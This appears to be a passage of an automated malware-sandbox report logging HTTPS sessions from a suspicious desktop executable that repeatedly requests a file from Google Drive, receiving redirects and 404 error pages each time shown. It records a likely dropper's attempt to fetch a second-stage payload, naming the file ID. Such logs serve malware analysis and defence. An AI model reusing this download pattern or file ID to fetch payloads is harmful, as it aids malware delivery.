                                                      2025-01-11 04:07:12 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 58 64 6a 55 75 76 4c 31 75 4e 76 72 43 2d 33 79 50 45 5f 33 4c 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="XdjUuvL1uNvrC-3yPE_3Lg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      64192.168.2.1150044172.217.16.1424437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:07:13 UTC424OUTGET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:14 UTC1920INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:13 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-XeH41ixCPlkLLnoxsNuFVg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      65192.168.2.1150045142.250.184.2254437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:07:14 UTC466OUTGET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:15 UTC1851INHTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgT4uuRPg2l-5AiBPijV9u2-_M1B_K0sJ0058W5N0wx43cawg7SM_MehnHfClgFBuGbbwDpEBJM
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:15 GMT
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-egoQtzVXlHtqRHtsB8mn_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:07:15 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 33 72 46 48 39 4f 52 37 72 42 32 55 6d 4e 38 4a 62 74 52 6d 72 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="3rFH9OR7rB2UmN8JbtRmrw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      66192.168.2.1150046172.217.16.1424437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:07:15 UTC424OUTGET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:16 UTC1920INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:16 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy: script-src 'nonce-2iGl46ScZ_7097QimDg5sw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      67192.168.2.1150047142.250.184.2254437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:07:16 UTC466OUTGET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:17 UTC1844INHTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgQPqmjTMI653FfBuSHtnmV9dS7DUF62QsZBbW9nNns1d9jH811d0OjPRDYY2aW7HqfL
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:17 GMT
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Security-Policy: script-src 'nonce-7bd134m998viTHqfmd9iKw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:07:17 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 52 58 66 62 6e 4d 72 6a 4e 70 62 50 78 46 6a 43 70 68 55 4c 56 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="RXfbnMrjNpbPxFjCphULVw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      68192.168.2.1150048172.217.16.1424437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:07:18 UTC424OUTGET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:18 UTC1920INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:18 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-6lYj5HTi4PTwqQTbkncdxA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      69192.168.2.1150049142.250.184.2254437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:07:19 UTC466OUTGET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:19 UTC1844INHTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgTGUE6aBXiwHHRZEhZaw0NfkfKO7xp4yRxzRNdcdvEiijTYySwApKRo2-Z4uVLJ3ZpW
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:19 GMT
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-CoCzefY5EMfhb2PjZzv3hQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:07:19 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4a 45 63 63 5a 34 73 31 78 4c 54 53 6d 4a 77 58 77 41 57 68 36 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="JEccZ4s1xLTSmJwXwAWh6g">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      70192.168.2.1150050172.217.16.1424437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:07:20 UTC424OUTGET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:20 UTC1920INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:20 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-rGq3adOznrmi9K1Lm6VbJA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      71192.168.2.1150051142.250.184.2254437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:07:21 UTC466OUTGET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:21 UTC1851INHTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgRFG9Q9dl6SJGxuRrgQBsa7EGMaCZon0g3OkiK6-85QRAwRnP3d35BiHa3n7Ctq2RIHnbKsPDA
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:21 GMT
                                                      Cross-Origin-Opener-Policy: same-origin
